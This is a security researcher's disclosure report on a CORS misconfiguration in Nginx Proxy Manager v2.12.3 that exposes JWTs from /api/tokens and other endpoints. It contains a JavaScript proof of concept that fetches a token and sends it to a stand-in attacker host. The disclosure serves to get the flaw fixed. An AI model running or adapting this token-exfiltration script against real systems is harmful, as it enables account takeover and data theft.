[Security] Critical Token Theft Vulnerability in Nginx Proxy Manager v2.12.3 Leads to ATO via CORS Misconfiguration

[JFOZ1010]

Vulnerability Summary:

A CORS misconfiguration in Nginx Proxy Manager v2.12.3 allows unauthorized domains to access sensitive data, particularly JSON Web Tokens (JWT). This issue arises due to improper validation of the Origin header, allowing malicious third-party websites to intercept sensitive tokens sent by the server, leading to potential account takeover and unauthorized access to sensitive data.

Impact:

This vulnerability allows an attacker to redirect the authentication token to their own server by exploiting the lack of proper CORS validation. This can be done using a simple browser script, which redirects the token from the vulnerable endpoint /api/tokens to a Burp Collaborator server. Once the attacker captures the token, they can use it to perform unauthorized actions within the application, leading to the following potential consequences:

1. Unauthorized access to the application by stealing user tokens.
2. Data leakage, exposing sensitive user data.
3. Service disruption, if the attacker escalates the access.
4. Loss of confidentiality, as attackers can impersonate legitimate users.

Steps to Reproduce:

• POST /api/tokens HTTP/1.1

and we can see how the response returned the the JWT Token with the Access-Control-Allow-Origin: http://r6y0zdqpcyb8hp3qf1fj1rr29tfk3cr1.oastify.com right?

• Exploit (JavaScript script): A simple script can be executed in the browser's console to steal the JWT token and send it to a Burp Collaborator server or Evil Domain:

• The Exploit that i've created is this:

const apiUrl = 'http://localhost:81/api/tokens';
const collaboratorUrl = 'http://BURP-COLLAB.com/'; // Burp Collaborator URL or evil domain

const headers = {
  'Content-Type': 'application/json',
  'Authorization': 'Bearer null',
  'Origin': collaboratorUrl, // Use Burp Collaborator as Origin
  'Referer': 'http://localhost:81/login',
};

const body = {
  "identity": "[email protected]",
  "secret": "admin123"
};

// Sending the request to get the token
fetch(apiUrl, {
  method: 'POST',
  headers: headers,
  body: JSON.stringify(body),
  credentials: 'include' 
})
.then(response => response.json())
.then(data => {
  // Sending the token to Burp Collaborator
  fetch(collaboratorUrl + '?token=' + encodeURIComponent(data.token))
    .then(() => console.log('Token sent to Burp Collaborator'))
    .catch(err => console.error('Error sending token to Burp:', err));
})
.catch(error => console.error('Request error:', error));

• Token Intercepted: The captured token is sent to the Burp Collaborator server and can be used by the attacker to impersonate the user.

• CORS Vulnerable Endpoints: In addition to /api/tokens, I also discovered similar vulnerabilities in the following endpoints:

• /api/audit-log
• /api/nginx/proxy-hosts
• /api/users

These endpoints could also be exploited in a similar manner due to the misconfiguration.

---

Conclusion: This vulnerability can be exploited by attackers to steal authentication tokens, leading to a potential account takeover. It poses a significant risk to the confidentiality of the application and the security of users' data. Fixing the CORS misconfiguration is critical to mitigate the risk of unauthorized access.

As a best practice, it is strongly recommended to validate the Origin header properly to ensure that only trusted domains are allowed to interact with sensitive APIs.

Best Regards,
Juan Felipe Osorio Z
Security Researcher
LinkedIn • X (Twitter) • Website